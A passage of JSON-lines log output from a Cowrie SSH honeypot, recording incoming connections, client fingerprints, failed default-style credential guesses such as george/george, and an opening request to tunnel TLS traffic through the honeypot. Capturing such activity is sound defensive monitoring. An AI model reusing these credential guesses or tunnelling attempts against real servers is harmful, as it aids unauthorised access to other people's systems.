00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.208.164:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x1c\\nJ\\x15\\xcd\\xfd,\\x15}\\xe6\\x90\\xab\\xab2\\xef*km\\xe7\\xa0\\xa2\\xed\\x9d\\xa9\\xa9\\xff\\xb3\\xf0\\xdf\\xfe\\x0b\\xaf \\x04\\xdc]\\xc4.\\x98\\xe0\\xdbJv\\x98\\x9d\\xdd\\xc6\\xea]\\xb8\\x98*\\x1d\\x11^C\\xf4\\x92~\\xa6\\xff\\xd7\\x10\\x9f\\xe0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xb2\\xb62\\xb8L\\xaf\\xb3\\x8e\\x12\\x1c\\xbe\\x86\\xaf\\xe3h\\xd5D0\\xd8\\x94f\\xf0\\x98\\xdfz3%b\\xea\\x0b<\\x0e\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T21:10:06.521830Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:06.802755Z","src_ip":"80.94.95.118","session":"75b68eb2a468"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44120,"dst_ip":"1.2.3.4","dst_port":22,"session":"5deff93109a4","protocol":"ssh","message":"New connection: 212.227.235.229:44120 (1.2.3.4:22) [session: 5deff93109a4]","sensor":"my-vps","timestamp":"2025-08-26T21:10:07.333966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:07.335508Z","src_ip":"212.227.235.229","session":"5deff93109a4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:07.616800Z","src_ip":"212.227.235.229","session":"5deff93109a4"}
{"eventid":"cowrie.login.failed","username":"george","password":"george","message":"login attempt [george/george] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:09.743322Z","src_ip":"212.227.235.229","session":"5deff93109a4"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:11.229206Z","src_ip":"212.227.235.229","session":"5deff93109a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48766,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6888819271e","protocol":"ssh","message":"New connection: 212.227.235.229:48766 (1.2.3.4:22) [session: a6888819271e]","sensor":"my-vps","timestamp":"2025-08-26T21:10:18.100420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:18.387130Z","src_ip":"212.227.235.229","session":"a6888819271e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:18.419307Z","src_ip":"212.227.235.229","session":"a6888819271e"}
{"eventid":"cowrie.login.failed","username":"thomas","password":"thomas","message":"login attempt [thomas/thomas] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:20.434931Z","src_ip":"212.227.235.229","session":"a6888819271e"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:22.263655Z","src_ip":"212.227.235.229","session":"a6888819271e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48790,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bb3731dab5b","protocol":"ssh","message":"New connection: 212.227.235.229:48790 (1.2.3.4:22) [session: 7bb3731dab5b]","sensor":"my-vps","timestamp":"2025-08-26T21:10:25.241411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:25.307700Z","src_ip":"212.227.235.229","session":"7bb3731dab5b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:25.712757Z","src_ip":"212.227.235.229","session":"7bb3731dab5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48796,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7db3459341","protocol":"ssh","message":"New connection: 212.227.235.229:48796 (1.2.3.4:22) [session: da7db3459341]","sensor":"my-vps","timestamp":"2025-08-26T21:10:26.075085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:26.180851Z","src_ip":"212.227.235.229","session":"da7db3459341"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:27.329618Z","src_ip":"212.227.235.229","session":"da7db3459341"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48808,"dst_ip":"1.2.3.4","dst_port":22,"session":"85fbe13d7949","protocol":"ssh","message":"New connection: 212.227.235.229:48808 (1.2.3.4:22) [session: 85fbe13d7949]","sensor":"my-vps","timestamp":"2025-08-26T21:10:27.383636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:27.389280Z","src_ip":"212.227.235.229","session":"85fbe13d7949"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:27.639376Z","src_ip":"212.227.235.229","session":"85fbe13d7949"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44196,"dst_ip":"1.2.3.4","dst_port":22,"session":"d329e48cbed4","protocol":"ssh","message":"New connection: 212.227.235.229:44196 (1.2.3.4:22) [session: d329e48cbed4]","sensor":"my-vps","timestamp":"2025-08-26T21:10:28.039100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:28.046653Z","src_ip":"212.227.235.229","session":"d329e48cbed4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2